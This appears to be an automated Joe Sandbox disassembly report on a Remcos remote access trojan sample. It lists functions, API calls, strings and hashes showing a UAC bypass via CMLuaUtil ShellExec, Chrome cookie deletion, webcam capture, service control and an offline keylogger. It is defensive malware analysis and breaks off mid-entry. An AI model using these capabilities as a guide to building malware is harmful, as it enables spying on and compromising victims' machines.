_free.LIBCMT ref: 00450E89

Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00450E94
_free.LIBCMT ref: 00450E9F
_free.LIBCMT ref: 00450EF3
_free.LIBCMT ref: 00450EFE
_free.LIBCMT ref: 00450F09
_free.LIBCMT ref: 00450F14

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e6862f50bdfb19e703ceb93494df2a480b9e086095d1541665fc20bc27fa83d7
Instruction ID: daec5615db7e7013758d3903cf5d85e3f15d59fd03a3aabe3c4119ba64e21dd5
Opcode Fuzzy Hash: e6862f50bdfb19e703ceb93494df2a480b9e086095d1541665fc20bc27fa83d7
Instruction Fuzzy Hash: CC11B131505B04AAE930BFB2CC47FCB779C5F01319F814C1EBA9A66063CA2CBA094759

Uniqueness

Uniqueness Score: -1.00%

Function 0043A29A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A291,004391FE), ref: 0043A2A8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A2B6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A2CF
SetLastError.KERNEL32(00000000,?,0043A291,004391FE), ref: 0043A321

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 08359a294978b951ee6febe925dab381d1793c0aace0d6fcdcb34a4de7c4b766
Instruction ID: 23de1630c3ab367d37157a08cb97d7a79375857f6765cbdf10d4ad4e4b451835
Opcode Fuzzy Hash: 08359a294978b951ee6febe925dab381d1793c0aace0d6fcdcb34a4de7c4b766
Instruction Fuzzy Hash: FB01243214C3516EE6142779AC86A6B2648EB1A3BDF20133FFA28416F1EF1D4C91924D

Uniqueness

Uniqueness Score: -1.00%

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\yaALNupJCH.exe), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

CoUninitialize.OLE32 ref: 00407629

Strings

C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 004075B0, 004075B3, 00407605
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5
[+] ShellExec success, xrefs: 0040760E
[+] before ShellExec, xrefs: 004075F1

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Users\user\Desktop\yaALNupJCH.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-4265757848
Opcode ID: d5f38e2754d4a853ae590f96f95492258fb5b30eb1892ff619069dfefece9e33
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: d5f38e2754d4a853ae590f96f95492258fb5b30eb1892ff619069dfefece9e33
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9EF Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BA2B
GetLastError.KERNEL32 ref: 0040BA35

Strings

\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B9F6
UserProfile, xrefs: 0040B9FB
[Chrome Cookies found, cleared!], xrefs: 0040BA5B
[Chrome Cookies not found], xrefs: 0040BA4F

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 88ba7c6cca983678e9453ff976780c883a64346e89eba16ec9507ec9410efbb7
Instruction ID: f8558398cfa10caab86205241148ba1d2e69b793fc6e43cc3d80b603396840e2
Opcode Fuzzy Hash: 88ba7c6cca983678e9453ff976780c883a64346e89eba16ec9507ec9410efbb7
Instruction Fuzzy Hash: 5C01A271A402095ACA04BBB6DD5B8BE7728D911704F50017FF803725E2FE3E8A458ADE

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCE9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00475338), ref: 0041CCF2
ShowWindow.USER32(00000000,00000000), ref: 0041CD0B
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CD30

Strings

4.9.2 Pro, xrefs: 0041CD59
Remcos v, xrefs: 0041CD4B
CONOUT$, xrefs: 0041CD1E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$4.9.2 Pro$CONOUT$
API String ID: 2425139147-375169418
Opcode ID: 8df49d31de9d4cb6383eef02227129476ba2a6c9230629533c9b2db07849b5d1
Instruction ID: a7c8f46aab14db75db5c93cd186e9c048c6b423ceef1700afcb39e88372a2f18
Opcode Fuzzy Hash: 8df49d31de9d4cb6383eef02227129476ba2a6c9230629533c9b2db07849b5d1
Instruction Fuzzy Hash: 9A0144B1E80304AAEB10FBF19D8BF9D376C9B14745F600427B608A70D3EB7D9954466E

Uniqueness

Uniqueness Score: -1.00%

Function 00CCEB09 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00CB48D0,00000000), ref: 00CCEB51
__fassign.LIBCMT ref: 00CCED30
__fassign.LIBCMT ref: 00CCED4D
WriteFile.KERNEL32(?,00CB48D0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCED95
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CCEDD5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCEE81

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: ac2df0feb63bc4ea417fd33970f2b67c9a23f4787414d399e5317a2aced2874f
Instruction ID: 185fd0f332119e06065a952d780315ddb6ac65f8e7eb9f168862a0c208440580
Opcode Fuzzy Hash: ac2df0feb63bc4ea417fd33970f2b67c9a23f4787414d399e5317a2aced2874f
Instruction Fuzzy Hash: 45D16971D002589FCB15CFA8C980EEDBBB5BF49314F28416EE856BB342D731AA46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0043AA1C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043ABA9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ABC5
__allrem.LIBCMT ref: 0043ABDC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ABFA
__allrem.LIBCMT ref: 0043AC11
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC2F

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: ab469b58df769677e88436e296b01d902216950b9c6cf3364f1c10046dae446c
Instruction ID: 0494a107bc7118a0c65ff638fd2ae5d498b9f40573f82e97bb56a75a26127c98
Opcode Fuzzy Hash: ab469b58df769677e88436e296b01d902216950b9c6cf3364f1c10046dae446c
Instruction Fuzzy Hash: 89815C72A407066BE720EE7ACC81B6B73A99F48324F14612FF551D6381E77CDD108B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004028A4: std::_Xinvalid_argument.LIBCPMT ref: 004028A9

Sleep.KERNEL32(00000000,0040D1B0), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

GetFrame, xrefs: 0040459F
FreeFrame, xrefs: 004045B0
HNG, xrefs: 004045E6
CloseCamera, xrefs: 0040458E
OpenCamera, xrefs: 00404582

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 834325642-3054508432
Opcode ID: 4fa59adb23da4f9c83bb833969745be3854f348026a415c7aa23237aeae12d11
Instruction ID: 399280f60de85e060329c6f4ab31165944f92565a6c4adf25c6d9c2547c5904d
Opcode Fuzzy Hash: 4fa59adb23da4f9c83bb833969745be3854f348026a415c7aa23237aeae12d11
Instruction Fuzzy Hash: 2351E1B1A042106BCA14BB769D0AA6E3755ABC0748F00053FFA06677E2DF7C8E45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00411C4C Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004116EA: SetLastError.KERNEL32(0000000D,00411C6A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 004116F0

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 00411C85
GetNativeSystemInfo.KERNEL32(?,0040D1F0,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411C48), ref: 00411CF3
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411D17

Part of subcall function 00411BF1: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411D35,?,00000000,00003000,00000040,00000000,?,?), ref: 00411C01

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411D5E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411D65
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411E78

Part of subcall function 00411FC5: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411E85,?,?,?,?,?), ref: 00412035
Part of subcall function 00411FC5: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0041203C

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 2d5080cdee88ae4489b0304f1850a20b2adfe15f654517403e01e164c907dd0f
Instruction ID: aa09dbe93b48559441b8e69703723e77616d2dc90e2c663cf43076ad7bdcd395
Opcode Fuzzy Hash: 2d5080cdee88ae4489b0304f1850a20b2adfe15f654517403e01e164c907dd0f
Instruction Fuzzy Hash: 9E61CF70641311ABD7109F66C981BAB7BA5BF44740F04412AFF058B2A2EB7CE8D1CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00445839 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445865
__cftoe.LIBCMT ref: 00445897

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 9cc9e2441c9805497d6c6d45b19e56c861359f6979edbe3d494d5417b91ff5fb
Instruction ID: 61f1245a5bdd02f6de00c1f3f020f63fedb85c0006fd73e81189f4daecab80f4
Opcode Fuzzy Hash: 9cc9e2441c9805497d6c6d45b19e56c861359f6979edbe3d494d5417b91ff5fb
Instruction Fuzzy Hash: 69510B72904A05ABFF20AB598C41BAF77A8DF49334F20421FF815A6293DF3DD910866C

Uniqueness

Uniqueness Score: -1.00%

Function 00447431 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447539
__freea.LIBCMT ref: 004475E3
__freea.LIBCMT ref: 00447601

Part of subcall function 00435D83: _free.LIBCMT ref: 00435D99

Strings

a/p, xrefs: 004476C8
am/pm, xrefs: 00447664

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: 1b4becbc2c62a6ae7dce0a193be4bff326977229060301aef8006510559cc272
Instruction ID: 932c9bd22f8cf0e2033f9da72f7f035ab39ca9aaf1c56182f74d334176be82e0
Opcode Fuzzy Hash: 1b4becbc2c62a6ae7dce0a193be4bff326977229060301aef8006510559cc272
Instruction Fuzzy Hash: 4FD1F631908206DAFB28AF68C899BBBBBB1EF05310F24415BE5059B751D33D9D43CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00410DAF Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410DBC
int.LIBCPMT ref: 00410DCF

Part of subcall function 0040E00F: std::_Lockit::_Lockit.LIBCPMT ref: 0040E020
Part of subcall function 0040E00F: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E03A

std::_Facet_Register.LIBCPMT ref: 00410E0F
std::_Lockit::~_Lockit.LIBCPMT ref: 00410E18
__CxxThrowException@8.LIBVCRUNTIME ref: 00410E36
__Init_thread_footer.LIBCMT ref: 00410E77

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: 8a1c56814aaffb39b6a738752dfce106633844222024accdf427d11f3e27a8d3
Instruction ID: 387eaa89caa8dd4f8259d30b56db7845ab8ba92959ee530e51d282b7c15fb7ee
Opcode Fuzzy Hash: 8a1c56814aaffb39b6a738752dfce106633844222024accdf427d11f3e27a8d3
Instruction Fuzzy Hash: 34210432A00924ABC714EB6AD9459DE73A8AF49324F20046FF405A72D1DF78AD81CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABC6 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A2DC,00000000), ref: 0041ABD6
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A2DC,00000000), ref: 0041ABEA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041ABF7
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A2DC,00000000), ref: 0041AC2C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041AC3E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A2DC,00000000), ref: 0041AC41

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: 8ab29b6f8dfadc739c1cfd945ac31cc587d16b71351be81549c8dfaccb54f5d1
Instruction ID: bf0d9854aa1a1070f110eb920e3bd2440040cbff4b43ec2429cf537062a598c5
Opcode Fuzzy Hash: 8ab29b6f8dfadc739c1cfd945ac31cc587d16b71351be81549c8dfaccb54f5d1
Instruction Fuzzy Hash: 69014E71149215BBD6111B345C0DEFB3B5CDB41771F100317F715921D2EB68CD8195EA

Uniqueness

Uniqueness Score: -1.00%

Function 00CC3734 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00CC372B,00CC3599,00CC2CB5), ref: 00CC3742
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC3750
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC3769
SetLastError.KERNEL32(00000000,00CC372B,00CC3599,00CC2CB5), ref: 00CC37BB

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
Instruction ID: dc8aa67b92e72b64679542a0f475a74fdcda9298dc4fdd92ca2881420000e503
Opcode Fuzzy Hash: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
Instruction Fuzzy Hash: 2F01B1B2609792AFE6142675FDDAF5B27A8EB06774720822EF424890F2EE116F006344

Uniqueness

Uniqueness Score: -1.00%

Function 004480D5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
_free.LIBCMT ref: 0044810C
_free.LIBCMT ref: 00448134
SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 00448141
SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
_abort.LIBCMT ref: 00448153

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 72d9dfed2c612fb7fc40968e50d96285ced74183b045fe3906e70e8c12316b41
Instruction ID: 2456814f90d1a1756791b48dfe751582bdc8db7375cfa681c61f896b21bc20b7
Opcode Fuzzy Hash: 72d9dfed2c612fb7fc40968e50d96285ced74183b045fe3906e70e8c12316b41
Instruction Fuzzy Hash: E2F0A43510470067F612772A6C0BB6F25198BC3B66F36052FF918962A3EE6CCC43816D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9F4 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA03
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA17
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA24
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA45
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A571,00000000), ref: 0041AA48

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 60a7cbc30b89eb0f69decf0df0d6681b0d9bff21bb3b6cb3c15fbc2f13efb0a9
Instruction ID: f73aa30613e04d16d5c4f291a78da36d4cb0244c6024500b3a5cad33c6a737a3
Opcode Fuzzy Hash: 60a7cbc30b89eb0f69decf0df0d6681b0d9bff21bb3b6cb3c15fbc2f13efb0a9
Instruction Fuzzy Hash: 7AF0C231501218ABD611AF659C49DFF3B6CDF45BA6F000026FE0992192DB68CD4595A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAF8 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB07
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB1B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB28
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB37
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB49
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A4F1,00000000), ref: 0041AB4C

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: b8efc3080a58efbd5eeef1a2aefda9b54f9d6a5126152bd72706fcf9128d32df
Instruction ID: 37910627c879923e7165713963b3d859e7cdae02db8f746732cc22f85bec5969
Opcode Fuzzy Hash: b8efc3080a58efbd5eeef1a2aefda9b54f9d6a5126152bd72706fcf9128d32df
Instruction Fuzzy Hash: 62F02231501228ABD2106F249C49EFF3B6CDF40B62F00002AFF0992182DB38DD0596A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB5F Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB6E
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB82
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB8F
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB9E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041ABB0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041ABB3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 6b308d3d3828d04a5c81abbbdd3fc3d303577ed345ddfa8b1085d6bdbe930796
Instruction ID: b039222477f72e669e19058168d6a4c5c9cd5d8c05413f4857ae13130e95784f
Opcode Fuzzy Hash: 6b308d3d3828d04a5c81abbbdd3fc3d303577ed345ddfa8b1085d6bdbe930796
Instruction Fuzzy Hash: D5F02231501218ABD211AB24AC49EFF3B6CDB40B62F00006AFF0992182DB38CE4595A9

Uniqueness

Uniqueness Score: -1.00%

Function 00CC5586 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00CC55C8

Strings

.bat, xrefs: 00CC55F7
.exe, xrefs: 00CC55D5
.com, xrefs: 00CC5608
.cmd, xrefs: 00CC55E6

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
Instruction ID: 86941417921903d24e2c735264c716ba234c8beb55cd261c2ca8a4969ff0fc96
Opcode Fuzzy Hash: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
Instruction Fuzzy Hash: 7501267B614E15652624606DEC02F3F57988B91BB8726002FF968F73C2EE94FE8251D4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A179 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141

Strings

C}w, xrefs: 0040A1E9
Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

